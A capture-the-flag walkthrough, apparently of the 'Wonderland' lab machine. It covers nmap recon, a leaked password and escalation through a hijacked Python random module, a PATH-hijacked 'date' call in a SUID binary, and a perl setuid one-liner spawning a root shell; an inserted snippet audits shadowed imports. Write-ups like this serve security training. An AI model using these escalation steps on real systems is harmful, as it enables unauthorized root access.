Medium difficulty.
Surprisingly, there are only two questions.

===============================================================
root@ip-10-10-0-129:~# nmap -sV -sC 10.10.47.106

Starting Nmap 7.60 ( https://nmap.org ) at 2024-01-28 08:35 GMT
Nmap scan report for ip-10-10-47-106.eu-west-1.compute.internal (10.10.47.106)
Host is up (0.028s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (EdDSA)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
MAC Address: 02:EA:67:5B:75:21 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds

Nothing useful here.
Next, brute-force the directories. /r shows a hint to keep going, so continue brute-forcing from there:
->/a
->/b
->/b
->/i
->/t

rabbit? Not much use, emmm.
Hard to keep a straight face: it is right there in the page source.
alice:HowDothTheLittleCrocodileImproveHisShiningTail


Check sudo -l: there is a script.
/usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
This script uses the random library.
Run python3 -c 'import sys; print (sys.path)' to look at the predefined library search paths.

alice@wonderland:~$ python3 -c 'import sys; print (sys.path)'


['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']

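'' means the current directory (when a script file is run, this first entry is the script's own directory instead, here /home/alice), so write a random module in the current directory to replace the real random.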

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py (only rabbit has that permission)

And then we become rabbit.
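The sys.path lookup order used above can also be audited from the defender's side. This is an added example, not part of the original writeup: it lists the imports of a script (for instance one allowed in sudoers) that would resolve to a file sitting beside the script instead of the normal copy. The function names and the constructed sample file poem.py are assumptions made for illustration.

```python
import ast
import importlib.machinery
import os
import sys
import tempfile


def imported_modules(script_path):
    """Return the top-level module names a script imports."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names


def shadowed_imports(script_path, base_path=None):
    """Map module name -> file beside the script that shadows the normal one.

    When Python runs a script, sys.path[0] is the script's directory, so a
    same-named file there is found before the standard library copy.
    """
    script_dir = os.path.dirname(os.path.abspath(script_path))
    base = [p for p in (base_path or sys.path) if p and os.path.abspath(p) != script_dir]
    importlib.invalidate_caches()  # directory listings are cached per finder
    findings = {}
    for name in sorted(imported_modules(script_path)):
        local = importlib.machinery.PathFinder.find_spec(name, [script_dir])
        normal = importlib.machinery.PathFinder.find_spec(name, base)
        if local and normal and local.origin != normal.origin:
            findings[name] = local.origin
    return findings


def demo():
    """Constructed sample: a script that imports random, audited twice."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "poem.py")  # hypothetical file name
        with open(script, "w", encoding="utf-8") as fh:
            fh.write("import os\nimport random\nprint(random.random())\n")
        before = shadowed_imports(script)
        with open(os.path.join(d, "random.py"), "w", encoding="utf-8") as fh:
            fh.write("# constructed placeholder module\n")
        return before, sorted(shadowed_imports(script))
```

Python's -I (isolated mode) leaves the script's directory out of sys.path, which removes this lookup order for a script run that way.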

drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty

This ELF file has the SUID bit set.

teaParty: will reverse it tonight.

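/* Decompiled main() of teaParty; headers added so the listing compiles */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void main(void)
{
    setuid(0x3eb);   /* 0x3eb = 1003 */
    setgid(0x3eb);
    puts("Welcome to the tea party!\nThe Mad Hatter will be here soon.");
    /* /bin/echo is called by absolute path, date is not: it is resolved through PATH */
    system("/bin/echo -n \'Probably by \' && date --date=\'next hour\' -R");
    puts("Ask very nicely, and I will give you some tea while you wait for him");
    getchar();
    puts("Segmentation fault (core dumped)");   /* just a printed string, not a real crash */
    return;
}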

Found that it calls date.

It is not a full path, so we can hijack it through an environment variable.

export PATH=/tmp:$PATH puts /tmp first in PATH. Then create a file named date under /tmp:

#!/bin/bash

/bin/bash

Then chmod +x to give it execute permission.

Finally, run teaParty.
Successfully got hatter.
His password is in there; next, SSH in and escalate privileges.

Upload linpeas.

It finds: [screenshot]
A quick search turns up: [screenshot]

So run:
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Privilege escalation succeeded.